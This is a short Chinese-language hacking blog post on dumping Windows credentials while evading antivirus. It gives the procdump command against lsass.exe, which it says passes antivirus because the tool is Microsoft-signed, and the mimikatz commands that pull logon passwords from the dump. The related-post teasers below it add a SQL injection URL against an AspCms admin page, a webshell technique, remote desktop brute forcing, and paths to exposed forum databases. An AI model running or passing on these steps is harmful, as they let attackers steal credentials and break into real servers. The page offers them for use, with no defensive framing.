绕过杀毒软件抓取windows密码

hacker4年前 (2020-05-31)黑客文章715

使用procdump,由于是微软的东西,带微软签名杀软不会报毒。

procdump -accepteula -ma lsass.exe lsass.dmp

copy出 lsass.dmp到本机。

			mimikatz # sekurlsa::minidump lsass.dmp
		
			Switch to MINIDUMP
		
			mimikatz # sekurlsa::logonPasswords

具体可以参考原文：

http://blog.gentilkiwi.com/securite/mimikatz/minidump

标签: 黑客技术

返回列表

admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,pa...

实用环境，在Access后台其他方法不能拿到webshell 但是后台有SQL语句查询执行，就可以直接access导出一句话拿webshell了不过需要知道物理路径才能导出，利用IIS的解析漏洞...

其实爆破服务器很简单的，也是必学的。 3389是一个远程桌面的端口，很多人为了更方便管理服务器，更新服务器上的资源等，经常会开启3389端口，用nastat-an命令可以查看该端口的开启。对...

/data/dvbbs7.mdb 动网论坛数据库 /databackup/dvbbs7.mdb 动网论坛数据库 /bbs/databackup/dvbbs7.mdb 动网论坛数据库...

dedecms即织梦（PHP开源网站内容管理系统）。织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名，是国内最知名的PHP开源网站管理系统，也是使用用户最多的PHP类CMS系统，近日，...

一、提前准备专用工具： 1、Charles：https://www.charlesproxy.com （收费标准） 2、夜神模拟器：https://www.yeshen.com （完全免费） &n...

找黑客平台